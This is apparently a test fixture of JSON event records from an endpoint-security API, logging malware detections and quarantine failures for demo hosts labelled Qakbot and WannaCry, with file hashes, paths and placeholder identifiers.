+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0
fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 